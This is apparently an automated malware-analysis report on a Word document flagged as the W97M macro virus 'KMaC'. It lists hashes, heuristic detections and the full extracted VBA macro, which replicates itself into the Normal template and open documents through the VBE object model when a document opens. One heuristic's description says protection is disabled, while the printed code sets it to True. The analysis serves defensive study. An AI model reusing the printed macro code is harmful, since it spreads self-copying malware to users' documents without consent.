Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2661356c646ea7f2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.0 KB
Created: 2009-08-31 09:44:00
Authoring application: Microsoft Office Word
First seen: 2012-07-06
MD5: b87653125d7b85210b36d92823e1fb38
SHA-1: 0fd47dbc29cc57f12f2a2e8bc21b83b7c7af2184
SHA-256: 2661356c646ea7f21acd2fc3692ddb0fbb225764e3253f58a778760435294684
Risk score: 148

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-1560882 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1560882
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Target.VBProject.VBComponents(1).CodeModule.DeleteLines TargetStart, TargetCount
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1963 bytes
SHA-256: 960d86d9af67ec76c581888ce0f25f6b7b563e9eaf9a8fdc1da5096d57cc8cca

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Wm97.KMaC by Lys Kovick

Private Sub Document_Open()
On Error Resume Next
Word.Application.Options.VirusProtection = True 
Word.Application.Options.SaveNormalPrompt = True 
Word.Application.Options.ConfirmConversions = True 
MyStart = ThisDocument.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
MyCount = ThisDocument.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(MyStart, MyCount)
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
For TargetLines = 1 To Target.VBProject.VBComponents(1).CodeModule.CountOfLines
If UCase(Target.VBProject.VBComponents(1).CodeModule.ProcOfLine(TargetLines, vbext_pk_Proc)) = "DOCUMENT_OPEN" Then Exist = True
Next
If Exist = True Then
TargetStart = Target.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
TargetCount = Target.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
TargetCode = Target.VBProject.VBComponents(1).CodeModule.Lines(TargetStart, TargetCount)
If TargetCode <> MyCode Then
Target.VBProject.VBComponents(1).CodeModule.DeleteLines TargetStart, TargetCount
Target.VBProject.VBComponents(1).CodeModule.InsertLines TargetStart, MyCode
ChangeCode = True
End If
Else
Target.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
ChangeCode = True
End If
If Target = ActiveDocument And ChangeCode = True Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If 'Kraft Macaroni and Cheese
End Sub